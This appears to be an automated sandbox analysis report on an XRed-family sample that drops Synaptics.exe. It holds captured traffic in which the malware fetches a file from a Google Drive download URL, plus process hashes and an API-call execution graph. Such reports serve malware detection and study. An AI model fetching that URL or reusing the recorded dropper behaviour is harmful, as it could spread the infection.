                                                                                              Connection: close
                                                                                              2025-01-02 19:29:33 UTC147INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f
                                                                                              Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                              2025-01-02 19:29:33 UTC1390INData Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 77 6d 35 62 57 38 4d 58 55 54 30 59 63 36 38 34 58 74 43 71 6d 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67
                                                                                              Data Ascii: t Found)!!1</title><style nonce="wm5bW8MXUT0Yc684XtCqmA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                              2025-01-02 19:29:33 UTC115INData Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                              Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              148192.168.2.750207216.58.206.784434136C:\ProgramData\Synaptics\Synaptics.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2025-01-02 19:29:32 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                              User-Agent: Synaptics.exe
                                                                                              Host: docs.google.com
                                                                                              Cache-Control: no-cache
                                                                                              Cookie: NID=520=Iza8T9_l1iZAYHDGJisrnaN8y5GuoKZB-AuhebVGsQd3ocqHadJ9D_IqHl6JbzFlsWNzgAmmfOiShudpkox3PtukW4MhcOi0X_YSXZs6ZTASBhK_6u7NJRPnRx_EcCwXaJeJVJhTrDFGVgT4USSbBkCZmJ4XUgLKDOyhSCLnPr6yFQ6WgW12aA0
                                                                                              2025-01-02 19:29:33 UTC1314INHTTP/1.1 303 See Other
                                                                                              Content-Type: application/binary
                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                              Date: Thu, 02 Jan 2025 19:29:32 GMT
                                                                                              Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-ECFtHtumK8Rl9FiCpBhjAg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                              Server: ESF
                                                                                              Content-Length: 0
                                                                                              X-XSS-Protection: 0
                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                              X-Content-Type-Options: nosniff
                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                              Connection: close


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              149192.168.2.750212216.58.206.784434136C:\ProgramData\Synaptics\Synaptics.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2025-01-02 19:29:33 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                              User-Agent: Synaptics.exe
                                                                                              Host: docs.google.com
                                                                                              Cache-Control: no-cache
                                                                                              Cookie: NID=520=Iza8T9_l1iZAYHDGJisrnaN8y5GuoKZB-AuhebVGsQd3ocqHadJ9D_IqHl6JbzFlsWNzgAmmfOiShudpkox3PtukW4MhcOi0X_YSXZs6ZTASBhK_6u7NJRPnRx_EcCwXaJeJVJhTrDFGVgT4USSbBkCZmJ4XUgLKDOyhSCLnPr6yFQ6WgW12aA0
                                                                                              2025-01-02 19:29:33 UTC1314INHTTP/1.1 303 See Other
                                                                                              Content-Type: application/binary
                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                              Date: Thu, 02 Jan 2025 19:29:33 GMT
                                                                                              Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-rKOAOljl0tw-dvnorTikDQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                              Server: ESF
                                                                                              Content-Length: 0
                                                                                              X-XSS-Protection: 0
                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                              X-Content-Type-Options: nosniff
                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                              Connection: close


                                                                                              Statistics

                                                                                              CPU Usage

                                                                                              Click to jump to process

                                                                                              Memory Usage

                                                                                              Click to jump to process

                                                                                              High Level Behavior Distribution

                                                                                              Click to dive into process behavior distribution

                                                                                              Behavior

                                                                                              Click to jump to process

                                                                                              System Behavior

                                                                                              General

                                                                                              Target ID:0
                                                                                              Start time:14:28:30
                                                                                              Start date:02/01/2025
                                                                                              Path:C:\Users\user\Desktop\file.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:"C:\Users\user\Desktop\file.exe"
                                                                                              Imagebase:0x400000
                                                                                              File size:1'059'840 bytes
                                                                                              MD5 hash:EABA5B2C3B6607177112EC5F26438BA3
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:Borland Delphi
                                                                                              Yara matches:
                                                                                              • Rule: JoeSecurity_XRed, Description: Yara detected XRed, Source: 00000000.00000000.1251479603.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000000.00000000.1251479603.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                              Reputation:low
                                                                                              Has exited:true

                                                                                              General

                                                                                              Target ID:2
                                                                                              Start time:14:28:31
                                                                                              Start date:02/01/2025
                                                                                              Path:C:\Users\user\Desktop\._cache_file.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:"C:\Users\user\Desktop\._cache_file.exe"
                                                                                              Imagebase:0x1000000
                                                                                              File size:288'088 bytes
                                                                                              MD5 hash:FD6057B33E15A553DDC5D9873723CE8F
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Antivirus matches:
                                                                                              • Detection: 0%, ReversingLabs
                                                                                              Reputation:low
                                                                                              Has exited:false

                                                                                              General

                                                                                              Target ID:4
                                                                                              Start time:14:28:32
                                                                                              Start date:02/01/2025
                                                                                              Path:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:"C:\ProgramData\Synaptics\Synaptics.exe" InjUpdate
                                                                                              Imagebase:0x400000
                                                                                              File size:771'584 bytes
                                                                                              MD5 hash:7407C51DD7AC30C4D79658D991A8B5D6
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:Borland Delphi
                                                                                              Yara matches:
                                                                                              • Rule: JoeSecurity_XRed, Description: Yara detected XRed, Source: C:\ProgramData\Synaptics\Synaptics.exe, Author: Joe Security
                                                                                              • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\ProgramData\Synaptics\Synaptics.exe, Author: Joe Security
                                                                                              Antivirus matches:
                                                                                              • Detection: 100%, Avira
                                                                                              • Detection: 100%, Avira
                                                                                              • Detection: 100%, Joe Sandbox ML
                                                                                              • Detection: 92%, ReversingLabs
                                                                                              Reputation:low
                                                                                              Has exited:true

                                                                                              General

                                                                                              Target ID:6
                                                                                              Start time:14:28:33
                                                                                              Start date:02/01/2025
                                                                                              Path:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              Imagebase:0x2c0000
                                                                                              File size:498'688 bytes
                                                                                              MD5 hash:EAA6B5EE297982A6A396354814006761
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Antivirus matches:
                                                                                              • Detection: 0%, ReversingLabs
                                                                                              Reputation:low
                                                                                              Has exited:false

                                                                                              General

                                                                                              Target ID:7
                                                                                              Start time:14:28:34
                                                                                              Start date:02/01/2025
                                                                                              Path:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:"C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding
                                                                                              Imagebase:0xb40000
                                                                                              File size:53'161'064 bytes
                                                                                              MD5 hash:4A871771235598812032C822E6F68F19
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Reputation:high
                                                                                              Has exited:false

                                                                                              General

                                                                                              Target ID:16
                                                                                              Start time:14:28:52
                                                                                              Start date:02/01/2025
                                                                                              Path:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:"C:\ProgramData\Synaptics\Synaptics.exe"
                                                                                              Imagebase:0x400000
                                                                                              File size:771'584 bytes
                                                                                              MD5 hash:7407C51DD7AC30C4D79658D991A8B5D6
                                                                                              Has elevated privileges:false
                                                                                              Has administrator privileges:false
                                                                                              Programmed in:Borland Delphi
                                                                                              Reputation:low
                                                                                              Has exited:true

                                                                                              General

                                                                                              Target ID:21
                                                                                              Start time:16:25:10
                                                                                              Start date:02/01/2025
                                                                                              Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 4136 -s 15608
                                                                                              Imagebase:0xfb0000
                                                                                              File size:483'680 bytes
                                                                                              MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Reputation:high
                                                                                              Has exited:true

                                                                                              General

                                                                                              Target ID:34
                                                                                              Start time:16:25:32
                                                                                              Start date:02/01/2025
                                                                                              Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 4136 -s 2952
                                                                                              Imagebase:0xfb0000
                                                                                              File size:483'680 bytes
                                                                                              MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Reputation:high
                                                                                              Has exited:true

                                                                                              General

                                                                                              Target ID:35
                                                                                              Start time:16:25:33
                                                                                              Start date:02/01/2025
                                                                                              Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 4136 -s 14432
                                                                                              Imagebase:0xfb0000
                                                                                              File size:483'680 bytes
                                                                                              MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Reputation:high
                                                                                              Has exited:true

                                                                                              General

                                                                                              Target ID:36
                                                                                              Start time:16:25:33
                                                                                              Start date:02/01/2025
                                                                                              Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 4136 -s 14456
                                                                                              Imagebase:0xfb0000
                                                                                              File size:483'680 bytes
                                                                                              MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Reputation:high
                                                                                              Has exited:true

                                                                                              General

                                                                                              Target ID:37
                                                                                              Start time:16:25:34
                                                                                              Start date:02/01/2025
                                                                                              Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 4136 -s 3252
                                                                                              Imagebase:0xfb0000
                                                                                              File size:483'680 bytes
                                                                                              MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Reputation:high
                                                                                              Has exited:true

                                                                                              General

                                                                                              Target ID:38
                                                                                              Start time:16:25:34
                                                                                              Start date:02/01/2025
                                                                                              Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 4136 -s 15520
                                                                                              Imagebase:0xfb0000
                                                                                              File size:483'680 bytes
                                                                                              MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Reputation:high
                                                                                              Has exited:true

                                                                                              General

                                                                                              Target ID:39
                                                                                              Start time:16:25:34
                                                                                              Start date:02/01/2025
                                                                                              Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 4136 -s 14552
                                                                                              Imagebase:0xfb0000
                                                                                              File size:483'680 bytes
                                                                                              MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Has exited:true

                                                                                              Disassembly

                                                                                              Reset < >

                                                                                                Execution Graph

                                                                                                Execution Coverage:20%
                                                                                                Dynamic/Decrypted Code Coverage:79.8%
                                                                                                Signature Coverage:22.3%
                                                                                                Total number of Nodes:913
                                                                                                Total number of Limit Nodes:40
                                                                                                execution_graph 2848 1002e03 GlobalAlloc 3787 1002d05 3788 1002d4f SetFilePointer 3787->3788 3789 1002d1d 3787->3789 3788->3789 3871 1002827 3872 1002843 CallWindowProcA 3871->3872 3873 1002833 3871->3873 3874 100283f 3872->3874 3873->3872 3873->3874 3875 1002948 3876 1002964 3875->3876 3877 100294f SendMessageA 3875->3877 3877->3876 3878 100366a lstrcpyA 3879 1005b32 3 API calls 3878->3879 3880 10036a2 CreateFileA 3879->3880 3881 10036d4 WriteFile 3880->3881 3882 10036c5 3880->3882 3883 10036ec CloseHandle 3881->3883 3883->3882 2847 1002e10 GlobalFree 3765 10017b1 3766 10017eb GetDesktopWindow 3765->3766 3768 10017c4 3765->3768 3772 1002969 6 API calls 3766->3772 3767 10017c7 3768->3767 3771 10017dd EndDialog 3768->3771 3770 10017fa LoadStringA SetDlgItemTextA MessageBeep 3770->3767 3771->3767 3773 10029ea SetWindowPos 3772->3773 3773->3770 3775 1003773 3776 1003782 3775->3776 3777 1003808 3775->3777 3779 100378c 3776->3779 3782 10037b6 GetDesktopWindow 3776->3782 3778 1003811 SendDlgItemMessageA 3777->3778 3781 10037ae 3777->3781 3778->3781 3780 10037a5 EndDialog 3779->3780 3779->3781 3780->3781 3783 1002969 7 API calls 3782->3783 3784 10037c8 SetDlgItemTextA SetWindowTextA SetForegroundWindow GetDlgItem 3783->3784 3786 1002803 GetWindowLongA SetWindowLongA 3784->3786 3786->3781 3791 1005075 3792 1005085 3791->3792 3793 1005137 3791->3793 3792->3793 3795 1005099 3792->3795 3796 100513c GetDesktopWindow 3792->3796 3794 10051f7 EndDialog 3793->3794 3807 10050a3 3793->3807 3794->3807 3798 10050cc 3795->3798 3799 100509c 3795->3799 3797 1002969 7 API calls 3796->3797 3800 1005153 3797->3800 3802 10050d9 ResetEvent 3798->3802 3798->3807 3801 10050aa TerminateThread EndDialog 3799->3801 3799->3807 3803 100519c SetWindowTextA CreateThread 3800->3803 3804 100515d GetDlgItem SendMessageA GetDlgItem SendMessageA 3800->3804 3801->3807 3805 10038cc 24 API calls 3802->3805 3806 10051c5 3803->3806 3803->3807 3804->3803 3808 1005100 3805->3808 3810 10038cc 24 API calls 3806->3810 3809 100511a SetEvent 3808->3809 3811 1005109 SetEvent 3808->3811 3812 100288f 4 API calls 3809->3812 3813 10051d5 EndDialog 3810->3813 3811->3807 3812->3793 3813->3807 3814 1004e56 3815 1004e68 3814->3815 3849 1004ecd EndDialog 3814->3849 3816 1004e73 3815->3816 3817 1005009 GetDesktopWindow 3815->3817 3821 1004f33 GetDlgItemTextA 3816->3821 3822 1004e87 3816->3822 3834 1004e76 3816->3834 3818 1002969 7 API calls 3817->3818 3820 1005019 SetWindowTextA SendDlgItemMessageA 3818->3820 3823 100504a GetDlgItem EnableWindow 3820->3823 3820->3834 3824 1004f55 3821->3824 3851 1004f97 3821->3851 3825 1004f19 EndDialog 3822->3825 3826 1004e8e 3822->3826 3823->3834 3827 100285f lstrlenA 3824->3827 3825->3834 3828 1004e99 LoadStringA 3826->3828 3826->3834 3830 1004f5b 3827->3830 3831 1004ed3 3828->3831 3832 1004eb9 3828->3832 3829 10038cc 24 API calls 3829->3834 3835 1004f63 GetFileAttributesA 3830->3835 3830->3851 3856 10046d4 LoadLibraryA 3831->3856 3836 10038cc 24 API calls 3832->3836 3838 1004f71 3835->3838 3839 1004fa3 3835->3839 3836->3849 3842 10038cc 24 API calls 3838->3842 3841 1005b32 3 API calls 3839->3841 3840 1004eeb SetDlgItemTextA 3840->3834 3843 1004f00 3840->3843 3844 1004fae 3841->3844 3845 1004f82 3842->3845 3847 10038cc 24 API calls 3843->3847 3848 1003e60 37 API calls 3844->3848 3845->3834 3846 1004f8b CreateDirectoryA 3845->3846 3846->3839 3846->3851 3847->3849 3850 1004fb4 3848->3850 3849->3834 3850->3851 3852 1004fc4 3850->3852 3851->3829 3853 1003f0d 40 API calls 3852->3853 3854 1004fe3 3853->3854 3854->3834 3855 1004fe7 EndDialog 3854->3855 3855->3834 3857 10046f7 GetProcAddress 3856->3857 3860 10047ee 3856->3860 3858 1004710 GetProcAddress 3857->3858 3859 10047db FreeLibrary 3857->3859 3858->3859 3861 1004723 GetProcAddress 3858->3861 3859->3860 3862 10038cc 24 API calls 3860->3862 3861->3859 3864 1004736 3861->3864 3863 1004800 3862->3863 3863->3834 3863->3840 3865 1004743 GetTempPathA lstrlenA CharPrevA 3864->3865 3868 1004773 3864->3868 3866 100476a CharPrevA 3865->3866 3865->3868 3866->3868 3867 10047c9 FreeLibrary 3867->3863 3868->3867 3869 10047c3 3868->3869 3870 10047bb lstrcpyA 3868->3870 3869->3867 3870->3869 3885 100383d 3886 10038b9 EndDialog 3885->3886 3887 1003849 3885->3887 3890 1003853 3886->3890 3888 1003882 GetDesktopWindow 3887->3888 3893 1003850 3887->3893 3889 1002969 7 API calls 3888->3889 3891 1003892 SetWindowTextA SetDlgItemTextA SetForegroundWindow 3889->3891 3891->3890 3892 1003874 EndDialog 3892->3890 3893->3890 3893->3892 3894 1002b9d 3895 1002bb4 3894->3895 3896 1002bf8 ReadFile 3894->3896 3897 1002c14 3896->3897 2849 1005a5e GetCommandLineA 2850 1005a73 GetStartupInfoA 2849->2850 2852 1005ab0 GetModuleHandleA 2850->2852 2856 1005a00 2852->2856 2867 1004c18 2856->2867 2859 1005a46 2861 1005a56 ExitProcess 2859->2861 2862 1005a4f CloseHandle 2859->2862 2862->2861 2962 1002a34 FindResourceA SizeofResource 2867->2962 2870 1004c83 CreateEventA SetEvent 2871 1002a34 6 API calls 2870->2871 2873 1004caa 2871->2873 2872 10038cc 24 API calls 2900 1004e39 2872->2900 2874 1004cd5 2873->2874 2876 1004d65 2873->2876 2877 1004cbb 2873->2877 2995 10038cc 2874->2995 2967 10030a7 2876->2967 2880 1002a34 6 API calls 2877->2880 2878 1004ce5 2878->2900 2882 1004cd1 2880->2882 2882->2874 2885 1004cf4 CreateMutexA 2882->2885 2883 1004d86 2886 1004d9d FindResourceA 2883->2886 2887 1004d8e 2883->2887 2884 1004d77 2884->2872 2885->2876 2888 1004d0c GetLastError 2885->2888 2891 1004db1 LoadResource 2886->2891 2892 1004dbe 2886->2892 3020 1001c7f 2887->3020 2888->2876 2890 1004d19 2888->2890 2893 1004d22 2890->2893 2894 1004d34 2890->2894 2891->2892 2895 1004dc6 #17 2892->2895 2896 1004dcc 2892->2896 2897 10038cc 24 API calls 2893->2897 2898 10038cc 24 API calls 2894->2898 2895->2896 2899 1004dd4 2896->2899 2896->2900 2901 1004d32 2897->2901 2902 1004d45 2898->2902 3034 10041cd GetVersionExA 2899->3034 2900->2859 2909 10058fe 2900->2909 2904 1004d4a CloseHandle 2901->2904 2902->2876 2902->2904 2904->2900 2910 1005935 2909->2910 2911 100590a 2909->2911 3176 1003d13 2910->3176 2913 1005928 2911->2913 3156 1003d9a 2911->3156 3304 1004481 2913->3304 2915 100593a 2934 10059e1 2915->2934 3191 1005636 2915->3191 2921 1005968 SetCurrentDirectoryA 2922 1005993 2921->2922 2923 1005977 2921->2923 2924 10059a0 2922->2924 3248 1005209 2922->3248 2926 10038cc 24 API calls 2923->2926 2924->2934 2935 10059bb 2924->2935 3257 1001ef8 2924->3257 2927 1005987 2926->2927 3323 1003547 GetLastError 2927->3323 2929 1005964 2929->2921 2929->2934 2932 100598c 2932->2934 2933 10059dd 2933->2934 2936 10059f6 2933->2936 2939 1002eaf 2934->2939 2935->2933 3266 1005288 2935->3266 3326 1004657 2936->3326 2940 1002ec6 2939->2940 2945 1002f02 2939->2945 2941 1002ef2 LocalFree LocalFree 2940->2941 2944 1002edd SetFileAttributesA DeleteFileA 2940->2944 2941->2940 2941->2945 2942 1002f6a 2942->2859 2952 100263f 2942->2952 2943 1002f53 2943->2942 3755 1001946 2943->3755 2944->2941 2945->2943 2946 1002f1b lstrcpyA 2945->2946 2948 1002f34 2946->2948 2949 1002f3e SetCurrentDirectoryA 2946->2949 2950 1005b71 5 API calls 2948->2950 2951 1001c7f 16 API calls 2949->2951 2950->2949 2951->2943 2953 1002646 2952->2953 2958 100264b 2952->2958 2954 1002613 14 API calls 2953->2954 2954->2958 2955 10038cc 24 API calls 2959 100266e 2955->2959 2956 1002689 3759 10018b5 GetCurrentProcess OpenProcessToken 2956->3759 2957 100267d ExitWindowsEx 2960 100268e 2957->2960 2958->2955 2958->2959 2958->2960 2959->2956 2959->2957 2959->2960 2960->2859 2963 1002a59 2962->2963 2965 1002a7d 2962->2965 2964 1002a62 FindResourceA LoadResource LockResource 2963->2964 2963->2965 2964->2965 2966 1002a81 FreeResource 2964->2966 2965->2870 2965->2884 2966->2965 2968 1003466 2967->2968 2991 10030c4 2967->2991 2968->2883 2968->2884 2969 100317c 2969->2968 2970 100319a GetModuleFileNameA 2969->2970 2972 10031c1 2970->2972 2973 10031b9 2970->2973 2971 10030fb CharNextA 2971->2991 2972->2968 3075 1005be8 2973->3075 2975 10031e4 CharUpperA 2976 1003518 2975->2976 2975->2991 3087 100189e 2976->3087 2979 10033db lstrlenA 2979->2991 2980 100348e lstrlenA 2980->2991 2981 1003526 CloseHandle 2982 100352d ExitProcess 2981->2982 2983 1005b00 IsDBCSLeadByte CharNextA 2983->2991 2984 1003324 CharUpperA 2984->2991 2985 1003417 CharUpperA 2985->2991 2986 10032ef lstrcmpiA 2986->2991 2987 100338c CharUpperA 2987->2991 2988 100343c lstrcpyA 3080 1005b32 lstrlenA 2988->3080 2989 100327a CharUpperA 2989->2991 2991->2968 2991->2969 2991->2971 2991->2975 2991->2979 2991->2980 2991->2983 2991->2984 2991->2985 2991->2986 2991->2987 2991->2988 2991->2989 2992 100302b lstrlenA 2991->2992 2994 10034fe lstrcpyA 2991->2994 3084 100285f 2991->3084 2992->2991 2994->2991 2996 10038f2 2995->2996 3005 100394c 2995->3005 3093 1002aa6 2996->3093 2999 1003954 3001 10039a3 2999->3001 3002 100395a lstrlenA lstrlenA lstrlenA LocalAlloc 2999->3002 3000 100390f 3096 1005d22 3000->3096 3006 10039a9 lstrlenA lstrlenA LocalAlloc 3001->3006 3007 10039ec lstrlenA LocalAlloc 3001->3007 3004 100398a wsprintfA 3002->3004 3002->3005 3009 1003a1b MessageBeep 3004->3009 3005->2878 3006->3005 3010 10039d6 wsprintfA 3006->3010 3007->3005 3011 1003a0d lstrcpyA 3007->3011 3013 1005d22 6 API calls 3009->3013 3010->3009 3011->3009 3012 1003927 MessageBoxA 3012->3005 3016 1003a29 3013->3016 3017 1003a3c MessageBoxA LocalFree 3016->3017 3019 1005cd4 EnumResourceLanguagesA 3016->3019 3017->3005 3019->3017 3021 1001da2 3020->3021 3022 1001c94 3020->3022 3021->2878 3022->3021 3023 1001c9d lstrcpyA lstrcatA FindFirstFileA 3022->3023 3023->3021 3024 1001ce3 lstrcpyA 3023->3024 3025 1001d51 lstrcatA SetFileAttributesA DeleteFileA 3024->3025 3026 1001cfc lstrcmpA 3024->3026 3027 1001d7a FindNextFileA 3025->3027 3026->3027 3028 1001d0c lstrcmpA 3026->3028 3027->3024 3030 1001d92 FindClose RemoveDirectoryA 3027->3030 3028->3027 3029 1001d22 lstrcatA 3028->3029 3031 1005b32 3 API calls 3029->3031 3030->3021 3032 1001d43 3031->3032 3032->3027 3033 1001c7f 3 API calls 3032->3033 3033->3032 3035 10041f3 3034->3035 3036 100420d 3034->3036 3037 10038cc 24 API calls 3035->3037 3036->3035 3038 1004222 3036->3038 3049 1004208 3037->3049 3039 1004360 3038->3039 3038->3049 3117 1002691 3038->3117 3041 100445b 3039->3041 3043 10043be MessageBeep 3039->3043 3039->3049 3042 10038cc 24 API calls 3041->3042 3042->3049 3044 1005d22 6 API calls 3043->3044 3045 10043cb 3044->3045 3046 10043de MessageBoxA 3045->3046 3047 1005cd4 EnumResourceLanguagesA 3045->3047 3046->3049 3047->3046 3049->2900 3050 100168b 3049->3050 3051 10016b8 3050->3051 3056 100179c 3050->3056 3148 10015f6 